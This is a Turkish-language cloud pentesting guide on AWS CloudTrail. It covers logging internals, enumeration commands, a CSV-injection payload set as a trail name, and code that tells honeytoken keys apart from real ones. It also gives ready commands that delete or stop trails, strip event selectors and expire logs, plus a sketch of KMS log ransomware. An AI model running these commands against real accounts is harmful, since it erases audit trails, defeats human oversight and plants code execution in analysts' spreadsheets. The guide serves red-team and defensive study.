AWS - CloudTrail Enum

CloudTrail

AWS CloudTrail AWS ortamınızdaki etkinlikleri kaydeder ve izler. AWS kaynaklarıyla yapılan tüm etkileşimler için kimin ne yaptığını, ne zaman ve nereden olduğunu içeren ayrıntılı olay günlüklerini yakalar. Bu, değişikliklerin ve eylemlerin bir denetim izini sağlar, güvenlik analizi, uyum denetimi ve kaynak değişiklik takibi konusunda yardımcı olur. CloudTrail, kullanıcı ve kaynak davranışını anlamak, güvenlik duruşunu artırmak ve düzenleyici uyumu sağlamak için gereklidir.

Her kaydedilen olay şunları içerir:

• Çağrılan API'nin adı: eventName

• Çağrılan hizmet: eventSource

• Zaman: eventTime

• IP adresi: SourceIPAddress

• Ajan yöntemi: userAgent. Örnekler:

• Signing.amazonaws.com - AWS Yönetim Konsolu'ndan

• console.amazonaws.com - Hesabın kök kullanıcısı

• lambda.amazonaws.com - AWS Lambda

• İstek parametreleri: requestParameters

• Yanıt öğeleri: responseElements

Olaylar, yaklaşık her 5 dakikada bir JSON dosyasında yeni bir günlük dosyasına yazılır, CloudTrail tarafından tutulur ve nihayetinde günlük dosyaları yaklaşık 15 dakika sonra S3'e teslim edilir. CloudTrail günlükleri hesaplar ve bölgeler arasında birleştirilebilir. CloudTrail, günlük dosyası bütünlüğünü kullanarak, günlük dosyalarınızın CloudTrail tarafından size teslim edildiğinden beri değişmediğini doğrulamanıza olanak tanır. Bir özet dosyası içinde günlüklerin SHA-256 hash'ini oluşturur. Yeni günlüklerin sha-256 hash'i her saat başı oluşturulur. Bir Trail oluştururken olay seçicileri, kaydedilecek trail'i belirtmenize olanak tanır: Yönetim, veri veya içgörü olayları.

Günlükler bir S3 kovasında saklanır. Varsayılan olarak Sunucu Tarafı Şifreleme (SSE-S3) kullanılır, böylece AWS içeriği erişimi olan kişiler için şifre çözer, ancak ek güvenlik için KMS ile SSE ve kendi anahtarlarınızı kullanabilirsiniz.

Günlükler, bu ad formatına sahip bir S3 kovasında saklanır:

• BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD

• BucketName: aws-cloudtrail-logs-<accountid>-<random>

• Örnek: aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/

Her klasör içinde her günlük, bu formatı takip eden bir isme sahip olacaktır: AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz

Günlük Dosyası İsimlendirme Konvansiyonu

Ayrıca, dosya bütünlüğünü kontrol etmek için özet dosyaları aynı kovada bulunacaktır:

Birden Fazla Hesaptan Günlükleri Birleştirme

• Günlük dosyalarının teslim edileceği AWS hesabında bir Trail oluşturun

• CloudTrail için çapraz hesap erişimine izin veren hedef S3 kovasına izinler uygulayın ve erişime ihtiyacı olan her AWS hesabına izin verin

• Diğer AWS hesaplarında yeni bir Trail oluşturun ve 1. adımda oluşturulan kovayı kullanmayı seçin

Ancak, tüm günlükleri aynı S3 kovasında saklayabilseniz de, birden fazla hesaptan CloudTrail günlüklerini tek bir AWS hesabına ait CloudWatch Logs'a birleştiremezsiniz.

Tüm organizasyon hesaplarından 1'e CloudTrail

Bir CloudTrail oluştururken, organizasyondaki tüm hesaplar için cloudtrail'i etkinleştirmek ve günlükleri sadece 1 kovaya almak için belirtmek mümkündür:

Bu şekilde, tüm hesapların tüm bölgelerinde CloudTrail'i kolayca yapılandırabilir ve günlükleri 1 hesapta (korumanız gereken) merkezileştirebilirsiniz.

Günlük Dosyalarını Kontrol Etme

Günlüklerin değiştirilmediğini kontrol etmek için şunu çalıştırabilirsiniz:

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

CloudWatch'a Loglar

CloudTrail, şüpheli aktiviteler gerçekleştirildiğinde sizi uyaran uyarılar ayarlayabilmeniz için logları otomatik olarak CloudWatch'a gönderebilir. CloudTrail'in logları CloudWatch'a gönderebilmesi için bir rol oluşturulması gerektiğini unutmayın. Mümkünse, bu işlemleri gerçekleştirmek için AWS varsayılan rolünü kullanmanız önerilir. Bu rol, CloudTrail'in:

• CreateLogStream: CloudWatch Logs log akışları oluşturmasına izin verir

• PutLogEvents: CloudTrail loglarını CloudWatch Logs log akışına iletmesine izin verir

Olay Geçmişi

CloudTrail Olay Geçmişi, kaydedilen logları bir tabloda incelemenizi sağlar:

İçgörüler

CloudTrail İçgörüleri, CloudTrail yollarından yazma yönetim olaylarını otomatik olarak analiz eder ve size olağandışı aktiviteler hakkında uyarıda bulunur. Örneğin, belirlenen temel değerlerden farklı olarak TerminateInstance olaylarında bir artış varsa, bunu bir İçgörü olayı olarak göreceksiniz. Bu olaylar, olağandışı API aktivitelerini bulmayı ve yanıt vermeyi her zamankinden daha kolay hale getirir.

İçgörüler, CloudTrail loglarıyla aynı kovada saklanır: BucketName/AWSLogs/AccountID/CloudTrail-Insight

Güvenlik

Erişim Danışmanı

AWS Erişim Danışmanı, içgörülerini toplamak için son 400 günün AWS CloudTrail loglarına dayanır. CloudTrail, bir AWS hesabında yapılan AWS API çağrılarının ve ilgili olayların tarihini kaydeder. Erişim Danışmanı, bu verileri kullanarak hizmetlerin en son ne zaman erişildiğini gösterir. CloudTrail loglarını analiz ederek, Erişim Danışmanı bir IAM kullanıcısının veya rolünün hangi AWS hizmetlerine eriştiğini ve bu erişimin ne zaman gerçekleştiğini belirleyebilir. Bu, AWS yöneticilerinin izinleri iyileştirme konusunda bilinçli kararlar almasına yardımcı olur; çünkü uzun süre erişilmeyen hizmetleri tanımlayabilir ve gerçek kullanım desenlerine dayalı olarak aşırı geniş izinleri potansiyel olarak azaltabilir.

Eylemler

Enumerasyon

# Get trails info
aws cloudtrail list-trails
aws cloudtrail describe-trails
aws cloudtrail list-public-keys
aws cloudtrail get-event-selectors --trail-name <trail_name>
aws [--region us-east-1] cloudtrail get-trail-status --name [default]

# Get insights
aws cloudtrail get-insight-selectors --trail-name <trail_name>

# Get data store info
aws cloudtrail list-event-data-stores
aws cloudtrail list-queries --event-data-store <data-source>
aws cloudtrail get-query-results --event-data-store <data-source> --query-id <id>

CSV Injection

CloudTrail içinde, günlükler CSV olarak dışa aktarıldığında ve Excel ile açıldığında rastgele kodu çalıştıracak bir CVS enjeksiyonu gerçekleştirmek mümkündür. Aşağıdaki kod, yükü içeren kötü bir Trail adıyla günlük girişi oluşturacaktır:

import boto3
payload = "=cmd|'/C calc'|''"
client = boto3.client('cloudtrail')
response = client.create_trail(
Name=payload,
S3BucketName="random"
)
print(response)

Daha fazla bilgi için CSV Enjeksiyonları hakkında sayfayı kontrol edin:

Bu spesifik teknik hakkında daha fazla bilgi için https://rhinosecuritylabs.com/aws/cloud-security-csv-injection-aws-cloudtrail/ adresini kontrol edin.

Algılama Atlatma

HoneyTokens atlatma

Honeytoken'lar hassas bilgilerin sızdırılmasını tespit etmek için oluşturulmuştur. AWS durumunda, bunlar kullanımı izlenen AWS anahtarlarıdır, eğer bu anahtarla bir eylem tetiklenirse, o zaman birisi bu anahtarı çalmış olmalıdır.

Ancak, Canarytokens, SpaceCrab, SpaceSiren tarafından oluşturulan Honeytoken'lar ya tanınabilir hesap adı kullanıyor ya da tüm müşterileri için aynı AWS hesap kimliğini kullanıyor. Bu nedenle, eğer Cloudtrail herhangi bir günlük oluşturmadan hesap adını ve/veya hesap kimliğini alabilirseniz, anahtarın bir honeytoken olup olmadığını bilebilirsiniz.

Pacu bazı kurallara sahiptir, bir anahtarın Canarytokens, SpaceCrab, SpaceSiren'e ait olup olmadığını tespit etmek için:

• Eğer canarytokens.org rol adında görünüyorsa veya hesap kimliği 534261010715 hata mesajında görünüyorsa.

• Daha yakın zamanda test ettiğimizde, 717712589309 hesabını kullanıyorlar ve hala adında canarytokens.com dizesi var.

• Eğer SpaceCrab hata mesajında rol adında görünüyorsa.

• SpaceSiren, kullanıcı adları oluşturmak için uuids kullanır: [a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89aAbB][a-f0-9]{3}-[a-f0-9]{12}

• Eğer isim rastgele üretilmiş gibi görünüyorsa, bunun bir HoneyToken olma olasılığı yüksektir.

Anahtar Kimliğinden Hesap Kimliğini Almak

Erişim anahtarının içinde kodlanmış olarak Hesap Kimliğini alabilirsiniz, burada açıklandığı gibi ve hesap kimliğini Honeytoken AWS hesaplarınızın listesiyle kontrol edebilirsiniz:

import base64
import binascii

def AWSAccount_from_AWSKeyID(AWSKeyID):

trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
y = x[0:6]

z = int.from_bytes(y, byteorder='big', signed=False)
mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)

e = (z & mask)>>7
return (e)

print("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))

Check more information in the orijinal araştırma.

Log oluşturma

Bunun için en etkili teknik aslında basit bir tekniktir. Bulduğunuz anahtarı kullanarak kendi saldırgan hesabınızdaki bir hizmete erişin. Bu, CloudTrail'in KENDİ AWS hesabınızda bir log oluşturmasını sağlar ve kurbanın hesabında değil.

Sorun şu ki, çıktı bir hata gösterecek ve hesap kimliğini ve hesap adını belirtecek, böylece Honeytoken olup olmadığını görebileceksiniz.

Log olmadan AWS hizmetleri

Geçmişte bazı AWS hizmetleri CloudTrail'e log göndermiyordu (buradan bir liste bulabilirsiniz). Bu hizmetlerden bazıları, yetkisiz (honeytoken anahtarı) birinin erişmeye çalışması durumunda hata ile anahtar rolünün ARN'sini içeren bir yanıt verecektir.

Bu şekilde, bir saldırgan herhangi bir log tetiklemeksizin anahtarın ARN'sini elde edebilir. ARN'de saldırgan AWS hesap kimliğini ve adını görebilir, HoneyToken'ın şirket hesap kimliklerini ve adlarını bilmek kolaydır, bu nedenle bu şekilde bir saldırgan token'ın HoneyToken olup olmadığını belirleyebilir.

Üçüncü Altyapıya Erişim

Belirli AWS hizmetleri veritabanları veya Kubernetes kümeleri (EKS) gibi bazı altyapılar oluşturacaktır. Bir kullanıcı bu hizmetlerle doğrudan iletişim kurduğunda (Kubernetes API'si gibi) AWS API'sini kullanmayacaktır, bu nedenle CloudTrail bu iletişimi göremeyecektir.

Bu nedenle, EKS'ye erişimi olan bir kullanıcı EKS API'sinin URL'sini keşfettiyse, yerel olarak bir token oluşturabilir ve Cloudtrail tarafından tespit edilmeden API hizmetiyle doğrudan iletişim kurabilir.

Daha fazla bilgi için:

CloudTrail Yapılandırmasını Değiştirme

İzleri Sil

aws cloudtrail delete-trail --name [trail-name]

İzleri Durdur

aws cloudtrail stop-logging --name [trail-name]

Çok bölgeli günlüğü devre dışı bırak

aws cloudtrail update-trail --name [trail-name] --no-is-multi-region --no-include-global-services

Olay Seçicileri ile Günlüğü Devre Dışı Bırakma

# Leave only the ReadOnly selector
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[{"ReadWriteType": "ReadOnly"}]' --region <region>

# Remove all selectors (stop Insights)
aws cloudtrail put-event-selectors --trail-name <trail_name> --event-selectors '[]' --region <region>

İlk örnekte, tek bir olay seçici, tek bir nesne ile JSON dizisi olarak sağlanmıştır. "ReadWriteType": "ReadOnly" ifadesi, olay seçicinin yalnızca salt okunur olayları yakalaması gerektiğini belirtir (bu nedenle CloudTrail içgörüleri örneğin yazma olaylarını kontrol etmeyecek).

Olay seçiciyi belirli gereksinimlerinize göre özelleştirebilirsiniz.

S3 yaşam döngüsü politikası aracılığıyla günlük silme

aws s3api put-bucket-lifecycle --bucket <bucket_name> --lifecycle-configuration '{"Rules": [{"Status": "Enabled", "Prefix": "", "Expiration": {"Days": 7}}]}' --region <region>

Bucket Yapılandırmasını Değiştirme

• S3 bucket'ını sil

• CloudTrail hizmetinden gelen yazmaları reddetmek için bucket politikasını değiştir

• S3 bucket'ına nesneleri silmek için yaşam döngüsü politikası ekle

• CloudTrail günlüklerini şifrelemek için kullanılan kms anahtarını devre dışı bırak

Cloudtrail fidye yazılımı

S3 fidye yazılımı

Asimetrik bir anahtar oluşturabilir ve CloudTrail'in verileri o anahtar ile şifrelemesini sağlayabilir ve özel anahtarı silerek CloudTrail içeriğinin kurtarılamayacak hale gelmesini sağlayabilirsiniz. Bu temelde S3-KMS fidye yazılımı olarak açıklanmaktadır:

KMS fidye yazılımı

Bu, önceki saldırıyı farklı izin gereksinimleri ile gerçekleştirmenin en kolay yoludur:

Referanslar

• https://cloudsecdocs.com/aws/services/logging/cloudtrail/#inventory